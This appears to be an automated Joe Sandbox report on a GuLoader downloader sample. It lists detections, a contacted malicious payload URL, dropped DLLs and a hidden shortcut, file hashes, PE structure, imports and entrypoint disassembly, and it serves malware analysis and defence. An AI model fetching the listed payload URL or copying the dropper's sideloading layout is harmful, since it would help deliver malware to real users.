Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	14 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
3GJ6S3Kwnb.exe	42%	Virustotal		Browse
3GJ6S3Kwnb.exe	24%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\DiFxAPI.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DiFxAPI.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\DiFxAPI.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://bprbeulentechnik.ch/loader/amagidom_VRCLkUVry246.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bprbeulentechnik.ch/loader/amagidom_VRCLkUVry246.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	3GJ6S3Kwnb.exe	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	623825
Start date and time: 10/05/202221:02:38	2022-05-10 21:02:38 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	3GJ6S3Kwnb (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.evad.winEXE@1/9@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 62.9% (good quality ratio 61.7%) Quality average: 88.6% Quality standard deviation: 21.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 55 Number of non-executed functions: 30
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.223.24.244
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, time.windows.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\DiFxAPI.dll	SOAfficePho22041316180.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\DiFxAPI.dll	SOAfficePho22041316180.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\NativeAdapter.dll	SOAfficePho22041316180.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\NativeAdapter.dll	SOAfficePho22041316180.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\HPPrintScanDoctorDeploymentMgr.exe	SOAfficePho22041316180.exe	Get hash	malicious	Browse
	SOAfficePho22041316180.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Airplane_6.bmp

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
Category:	dropped
Size (bytes):	6869
Entropy (8bit):	7.844036691616615
Encrypted:	false
SSDEEP:	96:BSTzREW0VVUFRpw7uGkoTRs6iWOZnUhu+LRX6Xi/CwUxLekFFbzUVUL3mBXooPCn:oXRsVaEdDtZiFZn3+LRrmcUXLuCDDvoi
MD5:	B64BD3B79B7C8E73D671029057DB3AF5
SHA1:	FF782EE8498DA70E9032E5FB7C9219BB1F6BC877
SHA-256:	DC980E21E0D964FF2687706568CB9D017D33478AD42DE8AFE5734E7DA29EC267
SHA-512:	23B1A2A1A7BDE408F35412DCE9DD6ADD4E09DE990365C8B517ED073382D686FD90733EB83F4C04668702BD3122347F11E78DDA0524EDFCFD1CE078B39DAC4F8D
Malicious:	false
Reputation:	low
Preview:	......JFIF.....d.d.....:Exif..MM.......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(..........j..>..a.......I.......\|A./.E.~..u...4.8...7.#....8P..z....?>..q./.....t...V\|A99.......\....f....L.......\|.....4[N1.. s^..Eh....r...7.N?...>u..a..B.u......[......~.O.?....{.A...g...zx..._..%Y.2..j.............&..X.[.I.6uV.<..;._..sW:/.......z...1..(......H..s....5.c

C:\Users\user\AppData\Local\Temp\Bluetooth Suite help_SL.chm

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	45599
Entropy (8bit):	7.437630592326386
Encrypted:	false
SSDEEP:	768:ISQxjGPaR23xDPH/dw1P3MpowGMm9eKVg79y/cTu8wN5WIOmpGKM:IJjGPa2Dw1PWowzm9Wy/78K5rOaGH
MD5:	EE71A8FD316B4EFF843518B31B3D28C2
SHA1:	292A7ABE9EFE502336417EC613FEE0389FAECF1A
SHA-256:	5A82B5B6332F3CC60CE7E831DA08A486E81A9BA0C5477E4A694754F659A3FC9A
SHA-512:	718320C384787EF374A2A20E8058C04248952891973D146A7F88000892BBDD53976C54DC724519A1C5BC812A62677BC720EE3F1453818D478F2F6DDEFABBEDBC
Malicious:	false
Reputation:	low
Preview:	ITSF....`.......&..'.......\|.{.......".....\|.{......."..`...............x.......T.......................................ITSP....T...........................................j..].!......."..T...............PMGL0................/..../#IDXHDR......./#ITBITS..../#STRINGS...u.a./#SYSTEM..n.S./#TOPICS.....@./#URLSTR...@.5./#URLTBL...P.p./#WINDOWS...a.L./$FIftiMain...v..../$OBJINST...[.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...W../$WWKeywordLinks/..../$WWKeywordLinks/BTree...-.L./$WWKeywordLinks/Data...y4./$WWKeywordLinks/Map...-../$WWKeywordLinks/Property...7 ./Advanced_Phone_Operations.htm..k.l./Audio_Services.htm..W.e./Authorization_Options.htm..<.R$/Bluetooth Win7 Vista Suite help.hhc...W.Z$/Bluetooth Win7 Vista Suite help.hhk...1.../Bluetooth_Devices.htm.....V./Bluetooth_Devices_files/...//Bluetooth_Devices_files/colorschememapping.xml...=.:%/Bluetooth_Devices_files/filelist.xml...B.['/Bluetooth_Devices_files/themedata.thmx..... ./Bluetooth_Settings.htm...d..\./Bluetooth_

C:\Users\user\AppData\Local\Temp\DiFxAPI.dll

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	526456
Entropy (8bit):	6.008806658212827
Encrypted:	false
SSDEEP:	12288:5sxYL+kJmoPdVp6s3EJBjCvuF17+2NdJfh:5sxwSoPdVoBjCvuF17+2NdJfh
MD5:	52672A1E48BC8BE4035D8A4F345DFE44
SHA1:	4F7EB09FF33DFACE6CE24BEB33E51D1DA5A3ABA1
SHA-256:	87BA988A4858079CADCA5EAA760482CC5F1F05830EE62BBC5FDD9BF7B181F0D0
SHA-512:	4F589CE3FC97F1DBDB575510924B5AEA58061B2D95F909456ACDB170414282A081C18CA9945E604FBCE6F17D626B02B178E66294927C5350B91072357DABAEF1
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SOAfficePho22041316180.exe, Detection: malicious, Browse Filename: SOAfficePho22041316180.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T1...P.F.P.F.P.F7..F.P.F.P.F#Q.F7..F.P.F7..F.P.F7..F/P.F7..F.P.F7..F.P.F7..F.P.F7..F.P.F7..F.P.FRich.P.F........................PE..d.....IE.........." .....$.....................a.............................0.......x....@..........................................0......P................`..........x.... ......p...................................................(............................text...L".......$.................. ..`.data...0....@.......(..............@....pdata.......`.......0..............@..@.rsrc...............................@..@.reloc..$.... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HPPrintScanDoctorDeploymentMgr.exe

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68712
Entropy (8bit):	5.747257952291664
Encrypted:	false
SSDEEP:	768:7gR74zF0we+AyurPeX85DoCAb74WhHN9rOzOY4BsPjFjNafDGmhK:7gRMHebrPesdoCAvbhH/mRBjNv
MD5:	0D24B5089C4D15316A65E9250A9069BD
SHA1:	B8213016A9BCF8A3FF79B0CB140D969FC4005AEA
SHA-256:	F90D525CDCF3E3743B7BFC93B5EEA645CFF5CEAE9AF351B8A2B46521ED5B8684
SHA-512:	A8FA53744FEB5CE044FDB6A3311BA5D60DC923E4A2A375955C33C3971161C4CDDA100C66413DDB5AF509AE6AF4E7D9260223BC36288D48452022624D2B2BB339
Malicious:	false
Joe Sandbox View:	Filename: SOAfficePho22041316180.exe, Detection: malicious, Browse Filename: SOAfficePho22041316180.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A;...Z~..Z~..Z~.W2{..Z~.W2z..Z~.W2}..Z~.W2...Z~..".DZ~..Z...Z~..3w..Z~..3...Z~..Z..Z~..3\|..Z~.Rich.Z~.................PE..d...a..`.........."......~...v.......q.........@.............................0......./....`.....................................................X...............4.......h.... ..........p...................0...(...0................... ............................text....\|.......~.................. ..`.rdata..6S.......T..................@..@.data...h...........................@....pdata..4...........................@..@.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\NativeAdapter.dll

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	115840
Entropy (8bit):	6.055822744229893
Encrypted:	false
SSDEEP:	1536:aGAyFy2NpZ/wrdGlZuZ/X6HMnsOf5OlWNCA:yrdaAZX6HMnsW5OlqCA
MD5:	3CA31E349771C8E93AE7A7B57C98D7D5
SHA1:	5ABB06F1D6E3269FDFE006F7FB9B820B1253E7B0
SHA-256:	F2C59C276665763086ADD13ACA88FB07BE4C1DE8754145552A8AA88DCC5E403B
SHA-512:	E344F09DFDD80DE93C938E6B5BDB96E257D59F509631B8A3C3A8E75D73567976ED4471EADF8EA8A29F9F8226C8020D7FD2FA46B2B90D5B0DA6FDD179775ADD38
Malicious:	false
Joe Sandbox View:	Filename: SOAfficePho22041316180.exe, Detection: malicious, Browse Filename: SOAfficePho22041316180.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A.............4........[...............^.......K.......L.......\.......Y.....Rich....................PE..d......N.........." .....j...H.......q..............................................H.....@.....................................................x...............................(......................................................X...............H............text...?c.......d.................. ..`.nep....p............h.............. ..`.rdata..\5.......6...n..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..x...........................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\REINSPECTED.lnk

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	866
Entropy (8bit):	2.9094288868917673
Encrypted:	false
SSDEEP:	12:8gl0IsXowAOcQ/tz+7RafgKD+HBXi8g/3NJkKAd4t2Y+xIBjK:8XLDaRMgK6Hx949HAv7aB
MD5:	055BD989D013AA790C0B5FAFE457AF72
SHA1:	902502F2E1C1988A901CD8643F108F2F69197023
SHA-256:	9DF1F752DA3F94A16C961FC5023C3925C94DEB091B7E309D51791671394C88F4
SHA-512:	9F4A85A396A70E1CFC0D4C524C99AB98A014EAF83B31B08791B645415EFBC8B8F35C669B22E9BF97F5885267A9749CC7515C444BBA772E49D3CAA96CB7600DE2
Malicious:	false
Preview:	L..................F........................................................+....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....h.2...........Bedmte139.exe.L............................................B.e.d.m.t.e.1.3.9...e.x.e...........\.B.e.d.m.t.e.1.3.9...e.x.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

C:\Users\user\AppData\Local\Temp\Velsespladser5.tmp

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	data
Category:	dropped
Size (bytes):	85704
Entropy (8bit):	6.5058103756231835
Encrypted:	false
SSDEEP:	1536:YFq7W01QLwtoPeiWHGekz6uF2+VQdDLFdVvVRjCqrcf:kr01QLwm2fg6t2QdDpdVdM
MD5:	024442982DB5BCEA734C31B2D3D2A25C
SHA1:	F1D5EDB880CE04191E442F5A472081B263809994
SHA-256:	E176A6327774C84E9BB6AD61156A637CBFFAEB7DEABEBBDE01274C2964125A0E
SHA-512:	8AC7AF0B0208226DB8B46D18BAFF949ED3E2B65D9CFEC80BE3CCB5F113B857AC25288A056A17F74C1809469A571F93BF316DC157B02373EE42571C3A58BD09C0
Malicious:	false
Preview:	..)?:tWO......F..........].C. As..i....$..H..f7g.....+.5[.........i...9bmo....G...5.f.W....%lZ.......K.t..w.o&...........<...).gf7A2O.qV................vZ..o. ...K.f..N.>Q.T.Q..^.........WY;z..U....y10...dd8p....`MC....W]+..4.Ar%..B....x.{O..'...=..p..i..>x#.z..3...ae..?...`.....E..E.fa..B..]9$k.wNb78>o...{OZ.F.2...I[.'....vu...4%..I.B.....[.Nc..J>..,.Z.H..4.N........1....=....g%.v...<.v..!M.\P..8..c...h...wShkR.'.8r..Y.vz....(..r.....Z..(....=.$..d&..3..9/.n&M.hBAs.J~2>.k.G.at...a.x..R.L... .U..:."L..7..O(...{......;....}....~..K.....(I....).~.Pt.O..#r_z...GQ..%s....i..2P.l.]..[.f^.4..w....#..../T....'.G....._........(.......Q...3p.!E..nz....e...E..H...t...0s+6!..g.`..H. h..as.HL.....Tj..}...U.;...~. f.O4..R.&.0~...Y.E..n'Ri...k..qq..y.WgC....VTw`zW6m.*.XK!..[l:}=.nP....M........YO_.$/2=..V...d.>./...).K6....C.oO+.w.\)+<...~>....&.....)8.J.....P.....i..........a.9....P.6....X..GEYpH...9q8vP@6......v1Wm......ht..z/....0.C2.....9...t4f

C:\Users\user\AppData\Local\Temp\igoAudSessionMonitor.dll

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31712
Entropy (8bit):	6.3433279275707894
Encrypted:	false
SSDEEP:	384:eRg4IisNrETyVJqYgYhqRCMKOBQf0vSjcGrnMLWN/bptUkVXrnMQJK2TKrsBvdX9:e1eVC7s0vxGrn8WlbokVXrE2eooW
MD5:	ED2D8072113DC5CBE99A02B268754438
SHA1:	A39CD1298F70D4056835679C8E65A6668251B5DA
SHA-256:	F52203161DBD387CAD34CEA1B6551F238ACBC092D85AB1A58626BF32636D80C0
SHA-512:	B2BE621DAC9F3929C680C2F9BCF0652E1A6F0887A7099A8F74E565DB51246FDA8719049AF8A6F1A0DB811059DD8D979FB95F4D523C375EB154F82942ED26775C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i...`.F.o......o......{......a......j...}...h...}...l...i...V.......k.......h.....*.h...i.B.h.......h...Richi...........PE..d....^a_.........." .....0...,......L3...............................................%....`..........................................O......TP...............p.......Z...!......H....C..p........................... D..0............@...............................text...n/.......0.................. ..`.rdata.......@.......4..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..H............X..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\3GJ6S3Kwnb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.853944115448146
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3GJ6S3Kwnb.exe
File size:	425380
MD5:	6c6a52c18f0ca26d357f2b4430f31568
SHA1:	9b32a592e54100a67d907e2ad039b164961dc042
SHA256:	cbd91a64900eacff9502b5509769b33adb8472efadd2861d99fd95a06c5630be
SHA512:	043a76eb4be6164bbb6da7ed983ac5d37e8707453d18c139ead31eeda239f177b0f332f7cbd32f20cd0fb9329b8481cebd2488c0b23a892b7055f6ba9e16e78d
SSDEEP:	12288:wNX177TWqByR9zSHIrV6vq6q+n+S/1fZ6VG4u9:wNXtvWqfeVAxaSb548
TLSH:	3A94224B3B58C1F1E45A8930DD73AAF157BA6E37C9A62B471340BD9D3E31A41E80D742
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

File Icon


Icon Hash:	2333514d312b0c20

Static PE Info

General

Entrypoint:	0x4034f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F7EF8A6DCFAh
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F7EF8A6DCCAh
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A2D8h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc1000	0x10040	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6515	0x6600	False	0.661534926471	data	6.43970794855	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.45	data	5.14577456407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	False	0.499348958333	data	4.01369865045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2b000	0x96000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc1000	0x10040	0x10200	False	0.719098231589	data	6.8222486252	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc1418	0x58c8	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0xc6ce0	0x25a8	data	English	United States
RT_ICON	0xc9288	0x2319	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States
RT_ICON	0xcb5a8	0x13d6	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States
RT_ICON	0xcc980	0x10a8	data	English	United States
RT_ICON	0xcda28	0xea8	data	English	United States
RT_ICON	0xce8d0	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 7844557, next used block 4498117	English	United States
RT_ICON	0xcf178	0x668	data	English	United States
RT_ICON	0xcf7e0	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xcfd48	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xd01b0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 605552896, next used block 8260	English	United States
RT_ICON	0xd0498	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0xd05c0	0x144	data	English	United States
RT_DIALOG	0xd0708	0x100	data	English	United States
RT_DIALOG	0xd0808	0x11c	data	English	United States
RT_DIALOG	0xd0928	0x60	data	English	United States
RT_GROUP_ICON	0xd0988	0xae	data	English	United States
RT_VERSION	0xd0a38	0x2c8	data	English	United States
RT_MANIFEST	0xd0d00	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
